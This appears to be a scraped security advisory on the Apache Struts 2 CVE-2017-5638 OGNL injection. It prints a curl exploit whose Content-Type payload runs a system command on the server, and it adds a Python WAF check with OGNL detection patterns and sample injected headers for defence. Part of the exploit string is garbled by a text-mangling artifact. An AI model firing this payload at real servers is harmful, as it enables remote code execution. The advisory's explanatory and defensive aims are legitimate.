The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When an HTTP request with a malicious Content-Type header is sent to a Struts 2 endpoint, the parser fails to parse the header and builds an error message that includes the raw header value. The attacker embeds an Object-Graph Navigation Language (OGNL) expression in this malformed header. Because the error-handling routine passes the message through the framework's text localisation, which evaluates OGNL, the expression is executed on the server rather than treated as a plain string. OGNL is a powerful expression language that allows method execution and access to the underlying Java runtime, so this improper evaluation lets the attacker run arbitrary system commands with the privileges of the Struts application server, leading to full server compromise. The attack is particularly dangerous because it is easy to exploit and requires no authentication, making it a weapon of choice for widespread attacks.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How the Exploit Works:
Craft malicious HTTP request.
Embed OGNL in Content-Type.
Send to Struts endpoint.
OGNL executes server-side.
Attacker gains a remote shell.
Protection from this CVE:
Apply vendor patch.
Upgrade Struts version.
Use a WAF that validates the Content-Type header.
Restrict server network access.
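As an added example (not code from the original post or from the Struts project), here is the kind of Content-Type check a WAF rule or request filter would apply, written in Python and run over constructed sample requests. It flags values that contain OGNL syntax, and also rejects values the multipart parser could not parse, since the vulnerable code path is the parser's error handling; all function names and samples are assumptions of this example.

```python
import re
from typing import Dict, Optional

# Sequences that never occur in a legitimate media type but do occur in OGNL
# injected via Content-Type: the %{ / ${ delimiters, the @class@member
# static-access syntax, and object construction.
OGNL_EXPR = re.compile(r"[%$]\{|@[\w.]+@|\bnew\s+java\.", re.IGNORECASE)
SUSPICIOUS_TOKENS = ("_memberAccess", "DEFAULT_MEMBER_ACCESS", "ProcessBuilder",
                     "ognl.OgnlContext", "getRuntime")
# RFC 7231 shape: type/subtype followed by optional ;name=value parameters.
MEDIA_TYPE = re.compile(
    r'^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+'
    r'(\s*;\s*[A-Za-z0-9_-]+=("[^"]*"|[^;\s"]+))*\s*$')

def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the header block of a raw HTTP request as a lower-cased dict."""
    headers: Dict[str, str] = {}
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if not line:                             # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def classify_content_type(value: Optional[str]) -> str:
    """Return one of: ok, missing, ognl-injection, malformed."""
    if value is None:
        return "missing"
    lowered = value.lower()
    if OGNL_EXPR.search(value) or any(t.lower() in lowered for t in SUSPICIOUS_TOKENS):
        return "ognl-injection"
    # Anything the multipart parser cannot parse reaches the vulnerable
    # error-message path, so a malformed value is blocked even without OGNL.
    if not MEDIA_TYPE.match(value):
        return "malformed"
    return "ok"

def scan_request(raw_request: str) -> str:
    return classify_content_type(parse_headers(raw_request).get("content-type"))

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "benign": ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
               "Content-Type: multipart/form-data; boundary=----ctor42\r\n\r\n"),
    "ognl": ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
             "Content-Type: %{(#_='multipart/form-data').(#cmd='id')}\r\n\r\n"),
    "malformed": ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
                  "Content-Type: multipart/form-data; boundary=\r\n\r\n"),
}
```

Calling `scan_request` on each entry of `SAMPLES` yields `ok`, `ognl-injection` and `malformed` respectively; a filter would allow only `ok` through to the Struts endpoint.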
Impact:
Full system compromise.
Data theft.
Service disruption.
Malware installation.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode